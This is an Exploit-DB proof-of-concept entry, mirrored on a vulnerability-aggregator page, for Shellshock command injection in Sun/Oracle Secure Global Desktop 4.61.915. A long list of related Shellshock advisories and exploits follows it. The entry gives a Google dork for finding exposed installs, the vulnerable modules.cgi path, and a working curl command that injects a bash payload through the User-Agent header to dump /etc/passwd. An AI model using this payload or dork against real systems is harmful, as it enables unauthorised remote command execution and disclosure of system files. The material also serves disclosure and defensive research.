Lucene search
Lastc0deEDB-ID:39887HistoryJun 06, 2016 - 12:00 a.m.
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock)
2016-06-0600:00:00
lastc0de
www.exploit-db.com
29
AI Score
7.4
Confidence
Low
# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop
# Google Dork: intitle:Install the Sun Secure Global Desktop Native Client
# Date: 6/4/2016
# Exploit Author: [email protected]
# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html
# Version: 4.61.915
# Tested on: Linux
VULNERABLE FILE
http://target.com//tarantella/cgi-bin/modules.cgi
POC :
localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt
localhost@~#cat xixixi.txt
which will print out the content of /etc/passwd file.Related
zdt
zdt
Cisco UCS Manager 2.1(1b) - Remote Exploit (Shellshock)
2016-03-16 00:00:00
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Exploit (Shellshock)
2016-06-06 00:00:00
CUPS Filter Bash Environment Variable Code Injection Exploit
2014-10-29 00:00:00
packetstorm
packetstorm
Cisco UCS Manager 2.1(1b) Shellshock
2016-03-17 00:00:00
Sun Secure Global Desktop / Oracle Global Desktop Shellshock
2016-06-07 00:00:00
Apache Mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
2024-09-01 00:00:00
saint
saint
Bash environment variable command injection in Cisco UCS Manager
2016-03-24 00:00:00
Bash environment variable command injection in Cisco UCS Manager
2016-03-24 00:00:00
Bash environment variable command injection in Cisco UCS Manager
2016-03-24 00:00:00
openvas
openvas
Cisco UCS GNU Bash Environment Variable Command Injection Vulnerability (Shellshock)
2016-03-17 00:00:00
Oracle: Security Advisory (ELSA-2014-3094)
2015-10-06 00:00:00
exploitdb
exploitdb
Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)
2016-03-16 00:00:00
Apache mod_cgi - 'Shellshock' Remote Command Injection
2014-10-06 00:00:00
dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)
2014-09-29 00:00:00
exploitpack
exploitpack
Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)
2016-03-16 00:00:00
GNU bash 4.3.11 - Environment Variable dhclient
2014-10-02 00:00:00
dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)
2014-09-29 00:00:00
nessus
nessus
Oracle Linux 5 : bash (ELSA-2014-3094) (Shellshock)
2014-11-21 00:00:00
FreeBSD : bash -- remote code execution (512d1301-49b9-11e4-ae2c-c80aa9043978) (Shellshock)
2014-10-02 00:00:00
Oracle Linux 7 : bash (ELSA-2014-3092) (Shellshock)
2014-11-21 00:00:00
ubuntu
ubuntu
Bash vulnerabilities
2014-10-09 00:00:00
freebsd
freebsd
bash -- remote code execution
2014-09-27 00:00:00
metasploit
metasploit
Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
2014-09-25 18:26:57
CUPS Filter Bash Environment Variable Code Injection (Shellshock)
2014-10-19 17:58:49
Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
2014-09-25 06:19:14
oraclelinux
oraclelinux
bash security update
2014-11-20 00:00:00
bash security update
2014-11-20 00:00:00
bash security update
2014-11-20 00:00:00
seebug
seebug
CUPS Filter Bash Environment Variable Code Injection
2014-11-13 00:00:00
GNU bash 4.3.11 Environment Variable dhclient Exploit
2014-10-10 00:00:00
Bash 4.3 θΏη¨ε½δ»€ζ§θ‘ζΌζ΄
(η ΄ε£³)
2014-09-26 00:00:00
attackerkb
attackerkb
CVE-2014-6271
2014-09-24 00:00:00
arista
arista
Security Advisory 0006
2014-09-29 00:00:00
ubuntucve
ubuntucve
CVE-2014-6278
2014-09-30 00:00:00
cve
cve
ibm
ibm
cvelist
cvelist
CVE-2014-6278
2014-09-30 10:00:00
suse
suse
Security update for Containment-Studio (important)
2014-10-14 01:05:00
Security update for SLES 12-SP1 Docker image (important)
2017-10-11 03:07:32
Security update for SLES 12 Docker image (important)
2017-10-11 03:06:53
debiancve
debiancve
CVE-2014-6278
2014-09-30 10:55:04
nvd
nvd
mageia
mageia
Updated bash packages fix multiple security vulnerabilities
2014-10-01 13:34:33
gentoo
gentoo
Bash: Multiple vulnerabilities
2014-10-04 00:00:00
prion
prion
Design/Logic Flaw
2014-09-30 10:55:00
Design/Logic Flaw
2014-10-13 18:55:00
Design/Logic Flaw
2014-10-03 18:55:00
huawei
huawei
Security Advisory-Bash Code Injection Vulnerability
2014-10-24 00:00:00
f5
f5
K15629 : Multiple GNU Bash vulnerabilities
2015-05-22 00:00:00
SOL15629 - Multiple GNU Bash vulnerabilities
2014-09-25 00:00:00
jvn
jvn
JVN#55667175: QNAP QTS vulnerable to OS command injection
2014-10-28 00:00:00
vmware
vmware
VMware product updates address critical Bash security vulnerabilities
2014-09-30 00:00:00
VMware product updates address critical Bash security vulnerabilities
2014-09-30 00:00:00
threatpost
threatpost
Researcher Takes Wraps off Undisclosed Bash Vulnerabilities
2014-10-03 05:00:50
checkpoint_advisories
checkpoint_advisories
cisco
cisco
GNU Bash Environment Variable Command Injection Vulnerability
2014-09-26 01:00:00
kitploit
kitploit
ShellShockHunter - It's A Simple Tool For Test Vulnerability Shellshock
2021-02-10 11:30:00
securityvulns
securityvulns
CA20141001-01: Security Notice for Bash Shellshock Vulnerability
2014-10-13 00:00:00
the other bash RCEs (CVE-2014-6277 and CVE-2014-6278)
2014-10-05 00:00:00
bash code execution
2014-10-13 00:00:00
